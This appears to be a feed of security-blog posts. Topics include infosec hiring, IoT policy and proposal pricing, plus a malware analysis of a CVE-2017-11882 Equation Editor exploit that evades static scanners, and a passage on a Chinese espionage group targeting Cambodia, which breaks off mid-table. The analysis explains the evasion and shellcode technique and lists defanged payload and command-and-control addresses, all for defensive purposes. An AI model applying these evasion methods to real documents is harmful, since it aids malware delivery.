In people management, one of the rules that you learn is that you need to evaluate performance based on attainable and measurable indicators. I propose this needs to be the same for the hiring process so that the hiring manager can make a meaningful decision.

Ultimately, interviewing a candidate on the principles of discussion, exchange and analytic capabilities will help the hiring manager identify the right person. It’s important to assess whether the person has a good foundational skill set that allows them to analyse and understand the work that needs to be performed. A good candidate not only needs the technical competencies but also the softer skills that help them adapt, learn and acquire the broader capabilities needed to successfully integrate into a team. Onboarding and probationary periods are there to allow a team to conduct a final check of the candidate’s technical and soft skills.

So what needs to change? I believe hiring managers need to ask themselves whether searching for that golden needle in the haystack is the most effective way to identify and recruit talent. By treating the interview as a constructive discussion instead of a vague and rigid Q&A, companies will get a better view of how a candidate might actually work on the ground. And by adapting questions to the level of experience in front of them, they are likely to see much more potential from every candidate that they engage with. Sure, the infosec talent pool might not be overflowing, but maybe our skills shortage isn’t quite as terrible as we might think.

The post InfoSec Recruiting – Is the Industry Creating its own Drought? appeared first on Liquidmatrix Security Digest.

Welcoming the Conversational Economy | Securing the Voice Channel

In our latest study, 500 IT and business leaders across the US, France, Germany, and the UK were surveyed; 85 percent of businesses expect to use voice technology in the next year despite significant security fears. Coming together to create a “Conversational Economy,” 28 percent of businesses currently communicate with customers via voice technology, including Microsoft’s Cortana and Amazon’s Alexa voice assistants. In this new ecosystem, voice is coming to dominate other interfaces, and enterprises are moving quickly to adapt.

The number of businesses using voice to interact with their customers is set to triple, with over two-thirds planning to use voice for the majority of interactions, and nearly one fourth planning to use voice for all interactions, within the next five years. Additionally, respondents reflected not only growing trust in voice technology’s capabilities, but also ambitious enterprise plans for voice.

Enterprises are taking a considered approach when examining and deciding which assistant would fit into their business processes – even though Amazon’s Alexa has ruled headlines.

Though businesses seem to be welcoming voice technology with open arms, there are also high levels of concern (80 percent) about businesses’ ability to keep the data acquired through voice-based technology safe. This concern about securing voice as an interface is one of the main factors determining how quickly the conversational economy will grow.

Vijay Balasubramaniyan, CEO and Co-founder, Pindrop, said: “People’s security, identity, and therefore the wider Conversational Economy, is at stake as its use increases. If businesses intend to use voice technology for the majority of customer interactions in the near-future they need to make sure that this method of interaction is as secure as any other.”

Learn more here.

The post Welcoming the Conversational Economy | Securing the Voice Channel appeared first on Pindrop.

How to Get Paid for Proposals

Proposals are one of the most expensive things you will spend your time on in a small business (or a large business, for that matter). You not only spend tons of time discovering and understanding what the client needs, but you also spend countless hours (often late at night) putting the proposal together, polishing it, tweaking the numbers and creating a whiz-bang presentation to accompany the proposal.

All of that for free, and often for nothing.

I’m very much against charging by the hour, but in this case calculating your effective hourly rate is a good exercise:

Let’s say that you recently landed a project and you’re going to make $10,000 from it. You’re going to spend 50 hours delivering the project, so you’re earning $200 per hour (this is your billable rate). Easy calculation. But when you figure in the time that you spent putting the proposal together – let’s say another 20 hours – you’re only generating around $142 per hour, a drop of almost 30% in your effective hourly rate. Add in the other non-billable time you spent with the client and you’re easily pushing your effective hourly rate – for that project – down below 50% of your billable rate.
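The arithmetic above is worth checking for your own projects; a tiny sketch using the numbers from the example (the helper function is mine, purely for illustration):

```python
def effective_hourly_rate(fee, delivery_hours, unbilled_hours):
    """Fee earned divided by ALL hours spent, billable or not."""
    return fee / (delivery_hours + unbilled_hours)

fee = 10_000
billable_rate = fee / 50                              # $200/hour on delivery hours alone
with_proposal = effective_hourly_rate(fee, 50, 20)    # ~$142.86/hour once proposal time counts
drop = 1 - with_proposal / billable_rate              # ~29% drop in effective rate
print(f"billable ${billable_rate:.0f}/h, effective ${with_proposal:.2f}/h, drop {drop:.0%}")
```

Plug in your own non-billable hours and the drop is usually worse than you expect.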

Pushing your effective hourly rate down is of course not the only bad thing that happens.

It breaks my heart

You put your heart and soul into understanding what the client really needs, give them the benefit of your experience to make sure they don’t fall into traps and put a lot of thought and effort into how you can help them solve their business problem. You’re invested – both in time and in emotional energy.

So when they turn you down, there’s a double whammy. You’ve just done a lot of work for nothing and you’ve just had your emotional investment kicked in the face (or that’s how it feels, at least at first). That hurts – especially when you’re new to the game. Over time you learn that opportunities come and go and you get less emotionally invested, but each time a proposal doesn’t hit the mark you take an emotional hit.

But what if there’s a better way? What if you could actually get paid for your proposals? And have your client like it that way?

There is a way to do this, and it starts with understanding the value of the proposal.

Proposals are valuable

By the time a client asks you to put together a proposal, you’ve already been dancing for a while. You’ve had some initial meetings, a couple of discovery sessions and they like what they see.

Now they ask you to do a proposal, and you’re going to have to spend more time with them. You need to make sure you understand exactly what they need, how much you can get done within their budget, what takes priority and where the skeletons are. You’re going to apply your expertise to dig into details, find out what else needs fixing and so on…the point is you’re going to spend more time with them.

Then you head off to your cave, put together the proposal and present it to them. And they say thanks, great work, we’ll get back to you. So far so good.

How much value did your potential client get from this proposal development process? The answer is: a lot.

They’ve just had an expert analyse their problem, dig into the details and tell them what they need to do to solve the problem. They now understand their problem a lot better and know what needs to be done to fix it (even if they don’t have the expertise to do it themselves). And of course you may not be the only one submitting a proposal, so the client has received a lot of valuable advice – from multiple experts.

And you gave it to them for free.


Think about it this way: when you go to a doctor with a complaint, they will diagnose you, maybe run some tests, make some recommendations and perhaps prescribe some medicine. Then they’re going to ask you to come in for an extended treatment or checkup to see if things have improved. And you’re happy to pay for this initial consultation.

When you develop a proposal for a client, you’re effectively doing what a doctor does in an initial consultation. You’re listening to the “patient”, running some tests to find out if there’s a deeper cause for the problem, and applying your expertise to recommend a way to get rid of the problem.

You’ve provided a lot of value, but you’re willing to give it away for free because that’s the way your industry usually works. Doctors don’t work like this; they charge for the “proposal” phase of their work with you.

The first key in moving from free to paid proposals is to understand that your proposal is tremendously valuable to your client.

But you need to present it to them as something valuable; and you need to deliver that value. The way to do that is to provide a roadmap.

The differences between a proposal and a roadmap

A proposal is usually a document that defines a scope of work, the number of hours required to do it and a price. If you’ve been at this for a while you will know that you need to base the proposal on the client’s ROI (Return On Investment) – what they get in return for their investment in your services.

A roadmap is also a document, but in this case the document clearly spells out what the client will need to do (or get done) first, second and so on. A roadmap sometimes includes a timeline to help the client understand how long the whole process could take. Again, justifying the business case is critical to help the client make the right decision.

A roadmap is the output of one or more roadmap sessions. A roadmap session is like a discovery session, but includes co-development of the roadmap.

If you’re familiar with project planning, you will already have noticed that a roadmap is a high-level project plan.

But there are more differences between a proposal and a roadmap:


When you follow the proposal route of getting work, your engagement with the client looks something like this:

  • initial meeting to see if there’s a fit (make sure you can help them);
  • a series of meetings to discover what they really need;
  • crafting the proposal;
  • (if you’re experienced) working with the client on the draft proposal to make sure you’re hitting the mark;
  • presenting the final proposal to them; and
  • hoping for the best.

When you use the roadmap route, the engagement looks a little different:

  • initial meeting to see if there’s a fit (can you help them);
  • present the roadmap option (standard for each client); and
  • hope for the best.


Your client can do only one thing with a proposal: say yes or no (or haggle a bit). A roadmap is something they can use on their own, with you, or with someone else:

  • A proposal effectively says “here’s the stuff I will do for you”. A smart proposal says “here’s how I will solve your problem and here’s the ROI”.
  • A roadmap says “here’s where you need to get to, here’s the road you need to follow and here are the stops along the way. You can use this roadmap on your own, with me or with someone else.”


Saying yes to a proposal is a big step, because it usually requires the client to make a big financial investment. The risk for the client is high and their objections will reflect that.

Saying yes to a roadmap exercise is a much smaller commitment. My roadmap sessions typically run for half a day (usually with a couple of hours before and after) and therefore cost a lot less. Much easier for the client to say yes to this much smaller investment.

A difference in how they perceive your expertise

When you present a roadmap option you are clearly placing yourself in charge of the situation. You know exactly how you’re going to go about building the roadmap, you have a defined process and the confidence to present this as the right option for the client. (This is why the client is hiring you in the first place: you are the expert, you know how this should be done and you know exactly how to go about doing it.)

When you present a proposal, you are to some extent asking the client to approve not just the expenditure, but also to make a judgment on whether this is the right thing to do. You’ve given up some control of your expertise.

A difference in the amount of time involved

The proposal route is a big investment (in time) for you and for your client. It is not uncommon to spend tens or even hundreds of hours on discovery meetings, user requirements analysis and proposal polishing for a large contract. A roadmap approach, on the other hand, is a much smaller investment for you and for your client: you’ve spent maybe two or three hours with the client, and then it’s up to them to decide.

(There are more differences, for example the idea that a roadmap is a collaborative exercise versus a proposal which is something you give to the client, but I think you get the point.)


None of my roadmaps contain pricing. The whole idea is that the client can use the roadmap now, later, on their own, with me or with someone else – so I don’t want them to confuse the roadmap with a proposal. Where appropriate, I will send a proposal for some or all of the work in the roadmap; the proposal can be very short because the heavy lifting has already been done in the roadmap.

So how do you move from (free) proposals to (paid) roadmaps?

To get a client to pay for a roadmap, you have to deliver value. That value comes from three places:

  • the roadmap itself: the output of the roadmap session(s) – a tool the client can use;
  • the process you will use to create the roadmap: this is where your expertise has to shine; you must know exactly how you’re going to go about creating the roadmap; what happens before, during and after the roadmap session(s); what the output will look like, and how you’re going to get the client to co-develop the roadmap;
  • your confidence: you have to be confident that this is the right thing to do, the right way to do it and that it delivers substantial value to your client.

This is not an easy road by any means, but there is a way to build up to it:

  • Start by taking proposals you’ve done in the past and turning them into roadmaps. Can you make them look like high-level project plans? Can the work be clearly grouped into relatively small chunks where each chunk builds on the previous one? Is there value from each chunk of work?
  • Define your process for creating a roadmap. Before you head into a roadmap session, there’s likely some pre-work that you need to do, for example running an analysis on their website (if that’s part of the problem) or doing an analysis of their business using something like the Tornado Method. Then define what the output would typically look like, and what you need to do during a roadmap session to get there. Then define what happens after the session. Turn it all into a collection of checklists.
  • Trial and refine your process. Find a friend or a willing client to be your first roadmap client. Follow your process and make sure you make notes of what’s working and what needs to be improved. Refine your process and repeat the exercise. Each time you do it you will gain more confidence.

Remember that a roadmap is a short, low-cost exercise and therefore relatively easy to sell to potential clients. You have to stress that the exercise delivers a roadmap that they can then use themselves, with you or with someone else; and you will follow up with a proposal if and when they’re ready for it.

A roadmap gives your client clarity on their problem and what they need to do to solve it. They may not have the expertise to do it themselves (that’s where you will eventually earn your keep), but just the process of building the roadmap provides them with peace of mind and builds trust that you can solve the problem for them.

Finally, a roadmap educates your client. They will understand that there is a well-defined process for solving the problem, the sequence in which the work needs to be done and what they get out of each part. An educated client is collaborative, engaged and enthusiastic; your expertise just helps them solve a problem.

What you can do now

It took me about two years to move from free proposals to paid roadmaps. You can get there a lot faster because you can tap into articles like this and a growing awareness amongst professionals that proposals are highly valuable.

I will be releasing a step-by-step guide on how to move from free proposals to paid roadmaps in the near future. To get notified when this is released, sign up for my newsletter here – you will get access to more articles like this, I promise I won’t spam you and you can unsubscribe at any time.

And if you have questions or comments, please drop me a note!


Your IoT security concerns are stupid

Lots of government people are focused on IoT security, such as this bill or this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone or laptop, which is all “in your face”, IoT devices, once installed, are quickly forgotten. For another, the average lifespan of a device on your network is at least twice the duration of the vendor’s patch support.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don’t get applied cause a small but manageable, constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet, which was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have the unique requirements of being exposed to the Internet and needing a remote factory reset, and those led to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite in support of their vuln/patching policy, neither was really about vulns or patching.

Such technical analyses of events like Mirai and notPetya are ignored. Policymakers cherry-pick only the superficial conclusions that support their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19, shipped directly from Shenzhen, now look very different, with far less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.
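The address-space arithmetic behind that claim is easy to verify (the 100-billion device figure is the one cited above, not my own estimate):

```python
# IPv4 offers 2^32 addresses; the projected IoT population dwarfs it.
ipv4_addresses = 2 ** 32              # 4,294,967,296 addresses total
iot_devices = 100_000_000_000         # the 100-billion figure cited above

print(ipv4_addresses)                 # 4294967296
print(iot_devices / ipv4_addresses)   # ~23 devices for every IPv4 address
```

Even if every single IPv4 address were handed to an IoT device, you would still need roughly 23 devices sharing each one, which is why NAT and IPv6 are inevitable and why Mirai-style address-scanning worms lose their target-rich environment.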

Lastly, focusing on the vendor is a tired government cliche. Chronic internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt, users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within control of users, even home users. Yet government policy makers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests. 

The best government policy for IoT is to do nothing, or at least to focus on more relevant solutions than patching vulns. The ideas proposed above will add costs to devices while providing insignificant benefits to security. Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed.

Evading Static Analyzers by Solving the Equation (Editor)


As part of our efforts to self-evaluate our backend systems, we closely monitor the behavioral reports produced by our dynamic analysis system. Every detection is, in fact, cross-checked and correlated with several other pieces of information, including the output from a number of static analyzers.

A few weeks ago a small anomaly started to creep in when analyzing malicious documents: executions spawning a rogue Equation Editor process (often linked to arbitrary code execution) were no longer triggering our internal static analyzers. It was as if the malicious documents were leveraging a new CVE, possibly just added to a well-maintained document exploit builder (like the old Phantom exploit builder kit, or the Metasploit framework).

One of the malicious documents (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a) was obfuscated but the process snapshot was still clearly showing the exploitation of the same buffer overflow used by CVE-2017-11882. However, the header of the OLE object (as extracted by rtfobj) was clearly different.

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882 and cf63479cefc4984309e97ed71e34a078cbf21d6a.

This quickly explained why the static analyzer didn’t assert detection of the known CVE: the strings commonly used to detect CVE-2017-11882 rely on either the class name or some other byte sequence that, as shown in Figure 1, is now clearly missing. At this point, we decided to analyze the document in more detail.

OLE Object Analysis

The OLE object (as extracted by RTFScan and viewed in a structured storage viewer) clearly shows that even its stream type is somewhat generic (normally an Equation Editor OLE object contains an Equation Native stream, as further explained here). Instead, the OLE stream is parsed as the more obscure Ole10Native type (see Figure 2).

Figure 2: An OLE object featuring an Ole10Native stream.

There are two interesting things happening here: (i) Equation Editor is still invoked to process the OLE object regardless of the OLE format, and (ii) Equation Editor is able to parse this new and generic format. As we show in Figure 3, the first is achieved because the CLSID is also specified inside the OLE object itself (the reader can find a nice walk through on how this is done here).

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

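As an aside, scanning for an embedded CLSID is straightforward, because GUIDs are serialized on disk in a fixed mixed-endian layout. The following minimal Python sketch is our illustration, not part of the original analysis, and shows how a scanner could look for the Equation Editor CLSID from Figure 3 inside raw OLE bytes:

```python
import uuid

# The Equation Editor CLSID from Figure 3. bytes_le gives the on-disk
# (mixed-endian) serialization of a GUID, which is what appears in the blob.
EQ_EDITOR_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")

def contains_equation_editor_clsid(blob: bytes) -> bool:
    """Return True if the on-disk form of the CLSID appears anywhere in blob."""
    return EQ_EDITOR_CLSID.bytes_le in blob
```

This is only a presence check, of course; a real scanner would also have to locate the OLE object inside the RTF container first.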

As for the stream itself, its type is not something we see every day. Equation Editor, on the other hand, seems to know this format quite well, and in fact it parses the object without raising any issue: it selectively reads and tests specific bytes (the first and third byte of the MTEF header and the first two of the TYPESIZE header), and if some specific values are found (as shown in Figure 4), Equation Editor is finally convinced to parse the FONT record as well, triggering once again the same buffer overflow that is normally exploited in CVE-2017-11882.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

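Based on the values recovered in Table 2 (Appendix), the selective byte checks could be approximated as follows. This is a hedged sketch: per the analysis, only the bytes at offsets 0 and 2 of the MTEF header are actually tested (the rest were garbage in the sample), and the TYPESIZE check is omitted because its expected values are not given here.

```python
# Approximate the header checks Equation Editor performs on the Ole10Native
# stream, using the Table 2 values. The TYPESIZE check is intentionally left out.
def mtef_header_accepted(stream: bytes) -> bool:
    if len(stream) < 5:           # header is 5 bytes (Table 2)
        return False
    version_ok = stream[0] == 0x02  # offset 0: MTEF version 2
    product_ok = stream[2] == 0x01  # offset 2: generating product, 1 = Equation Editor
    return version_ok and product_ok
```

Note how permissive this is: the bytes at offsets 1, 3, and 4 can be anything, which is exactly what makes simple pattern matching on the header unreliable.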

Shellcode Analysis

The vulnerability exploited to execute the shellcode is indeed CVE-2017-11882; as soon as the FONT record is parsed, the control flow is transferred to 0x445203.


At this address, a RET instruction transfers control to the shellcode stored in a buffer in place of the FONT record (this exact method of executing shellcode is also used by CVE-2018-0802 and further explained here):

Figure 5: Shellcode stored as FONT name inside the FONT record.


The shellcode also uses an interesting way to find itself in memory. Unlike other malicious documents exploiting CVE-2017-11882, this sample does not rely on an API call to divert execution. Rather, it searches the OLE stream itself to locate the entry point of the shellcode. To succeed, it needs the following three hardcoded values:

  • Address 0x0045BD3C: this address references an object that contains a pointer to another temporary structure (see Table 3 in the Appendix for more details). This temporary structure points to the beginning of the Ole10Native stream as loaded in memory.
  • Address 0x004667B0: this address points to the imported function GlobalLock.
  • 0x11F: the entry point in the shellcode from where it will start executing.

These three values are then used as follows:

  1. First, the shellcode retrieves the handle of the memory object from 0x0045BD3C.
  2. The retrieved handle is then passed as a parameter to invoke the GlobalLock API.
  3. The returned pointer references the first byte of the OLE stream in memory. The shellcode now knows where it resides in memory and starts executing from StartOfShellcode+0x11F.
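The three steps above can be modeled in a few lines of Python. This is an illustrative model only, not real shellcode: memory is mocked as a dict of addresses, and global_lock stands in for the GlobalLock API resolved through the hardcoded import address.

```python
# Hardcoded values taken from the sample's shellcode (see the list above).
HANDLE_SLOT = 0x0045BD3C   # static address holding the memory-object handle
ENTRY_OFFSET = 0x11F       # offset of the shellcode entry point in the stream

def locate_shellcode_entry(memory: dict, global_lock) -> int:
    handle = memory[HANDLE_SLOT]       # 1. fetch the handle from the static slot
    stream_base = global_lock(handle)  # 2. GlobalLock(handle) -> first byte of OLE stream
    return stream_base + ENTRY_OFFSET  # 3. resume execution at base + 0x11F
```

The key design point is that nothing here depends on where the heap allocator happened to place the stream; the only fragile assumptions are the two static addresses inside the (non-ASLR) Equation Editor image.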

The sample goes on by downloading a file from hxxp://b.reich[.]io/hnepyp.scr, saving it to disk as name.exe, and executing it. In this report, we omit the analysis of this specific binary, as it is yet another Pony variant. Should the reader be interested, VirusTotal has a full report here (sha1: 2bcd81a9f077ff3500de9a80b469d34a53d51f4a); all IoCs are also listed in the Appendix, Table 1.

Why Static Analysis is not Enough

While in some cases static analysis can detect if a specific vulnerability is exploited, obfuscated samples often present quite a challenge even for the most sophisticated analyzer. In our case, a simple pattern match is not even possible: the only bits of information we can use to write a detection rule are the CLSID and the five bytes that are constant in the MathType OLE object (the OLE object used by Equation Editor).

A hypothetical static checker would need to:

  1. Extract the OLE object from the document
  2. Parse the OLE header and check if it is pointing to the Equation Editor CLSID
  3. Extract the Ole10Native stream
  4. Parse it and get the FONT record
  5. Check its actual length
  6. And finally, verify that the last four bytes of the buffer correspond to an address
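To make the six steps concrete, here is a rough Python sketch of such a checker. It is a sketch under stated assumptions: extract_ole_object and parse_font_record are hypothetical helpers supplied by the caller (no real library API is implied), and the 44-byte threshold and the address range are illustrative values, not figures from the analysis.

```python
# Hypothetical static checker for this delivery of CVE-2017-11882.
EQUATION_EDITOR_CLSID = "0002ce02-0000-0000-c000-000000000046"

def flags_cve_2017_11882(doc, extract_ole_object, parse_font_record) -> bool:
    ole = extract_ole_object(doc)                 # step 1: pull the OLE object
    if ole is None or ole["clsid"].lower() != EQUATION_EDITOR_CLSID:
        return False                              # step 2: check the CLSID
    font = parse_font_record(ole["ole10native"])  # steps 3-4: stream -> FONT record
    if font is None or len(font) <= 44:           # step 5: overlong name? (44 is illustrative)
        return False
    ret_addr = int.from_bytes(font[-4:], "little")  # step 6: trailing return address
    return 0x00400000 <= ret_addr < 0x00500000      # plausible EQNEDT32 image range
```

Even this sketch glosses over the hard part: steps 1, 3, and 4 each require a full parser for the corresponding format, which is exactly what pure pattern matching cannot provide.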

This is not a trivial task if done statically, and outright impossible if only pattern matching is available (as is the case with YARA rules, for example). On the other hand, Figure 6 shows the full behavioral analysis when the sample is analyzed dynamically.

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).



The sample subject of our analysis did not use any new CVE, but relied on an unexpected new way to deliver the old and well-known CVE-2017-11882. This delivery method effectively evaded all static analyzers relying on the OLE object's static information. By removing (intentionally?) all non-binary strings from the exploit data, the author considerably raised the bar for a static analyzer to detect this specific exploit.

Having said that, Microsoft has already issued an advisory addressing this specific CVE, so previous mitigations remain effective and still apply.

In conclusion, we verified whether MathType v7 (the successor of Equation Editor) was vulnerable to this specific parsing quirk when opening an Ole10Native stream, and we are glad to report that both DEP and ASLR mitigations are enabled, protecting the binary from the aforementioned vulnerabilities.


Indicator of Compromise                     Description
cf63479cefc4984309e97ed71e34a078cbf21d6a    SHA1, malicious document
2bcd81a9f077ff3500de9a80b469d34a53d51f4a    SHA1, loki payload
hxxp://b.reich[.]io/hnepyp.scr              URL, loki payload

Table 1: IoCs discussed in the blog post.

Offset Size (bytes) Description Value Comment
0 1 MTEF Version 0x2 Version 2
1 1 Generating Platform 0x8 Garbage
2 1 Generating Product 0x1 1 for Equation Editor
3 1 Product Version 0xB9 Garbage
4 1 Product Subversion 0xC9 Garbage

Table 2: Ole10Native MTEF header.

Offset Size (bytes) Description
0x0 4 Handle to the memory object storing the Ole10Native stream in memory
0x4 4 Size in memory
0x8 4 Size in memory
0x10 4 Index of the byte which will be read next from the stream
0x14 4 Unknown

Table 3: Temporary Structure Format.

The post Evading Static Analyzers by Solving the Equation (Editor) appeared first on Lastline.

Breaking ground: Understanding and identifying hidden tunnels

It’s me again – Cognito. As always, I’ve been hard at work with Vectra to automate cyberattack detection and threat hunting. Recently, we made an alarming discovery: hackers are using hidden tunnels to break into and steal from financial services firms!

Clearly, this is serious business if it involves bad guys targeting massive amounts of money and private information. But what exactly are we dealing with? Let’s dig into what hidden tunnels are and how I find them to uncover the answer.

IoT And Your Digital Supply Chain

“Money, it’s a gas. Grab that cash with both hands and make a stash.” Pink Floyd is always near and dear to my heart, and no doubt the theme song for a lot of producers of devices that fall into the category of the Internet of Things, or IoT.

I can’t help but giggle at the image that comes to mind when I think about IoT manufacturers. I have this vision in my head of a wild-eyed prospector jumping around after finding a nugget of gold the size of a child’s tooth. While this imagery may cause some giggles, it also gives me pause when I worry about what these gold miners are forgetting. Security comes to mind.

I know, I was shocked myself. Who saw that coming?

While there is a mad rush to stake claims across the Internet for things like connected toasters, coffee makers and adult toys, it seems security falls by the wayside. A lot of mistakes that were made and corrected along the way as the Internet evolved into the monster that it is today are returning. IoT appears to be following a similar trajectory, but at a far faster pace.

With this pace we see mistakes like IoT devices being rolled out with deprecated libraries and zero ability to upgrade their firmware or core software. But no one really seems to care as they count their money while they’re still sitting at the table. The problem really comes into focus when we realize that it is the rest of us who will be left holding the bag after these manufacturers have made their money and run.

Of further concern are the fractured digital supply chains that they are relying on. I’m worried that, at this dizzying pace of manufacture, miscreants and negative actors are inserting themselves into the supply chain. We have seen issues like this come to the forefront time and again. Why is it that we seem hell-bent on reliving the same mistakes all over again?

One of my favorite drums to pound on is the use of deprecated, known vulnerable, libraries in their code. I’ve watched talks from numerous presenters who unearthed this sort of behavior at a fairly consistent pace. What possible rationale could there be for deploying an IoT device in 2016 with an SSL library that is vulnerable to Heartbleed?

I’ll let that sink in for a moment.

And this is by no means the worst of the lot. These products are being shipped to market with preloaded security vulnerabilities that can lead to all manner of issues. Data theft is the one that people like to carry on about a fair bit, but it would be a fairly trivial exercise to compromise some of these devices and have them added to a DDoS botnet.

What type of code review is being done along the way on code written by outsourced third parties? This happens a lot, and it really does open a company up to the risk of malicious, or simply poor, code being introduced.

The IoT gold rush is a concern for me from a security perspective. Various analyst firms gush about the prospect of having 800 gajillion Internet-enabled devices online by next Tuesday, but they never talk about how we are going to clean up the mess later on. Someone always has to put the chairs up after the party is over.

Originally posted on CSO Online by me.

The post IoT And Your Digital Supply Chain appeared first on Liquidmatrix Security Digest.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. The TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, MURKYTOP, HOMEFRY, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious) | AIRBREAK Downloader
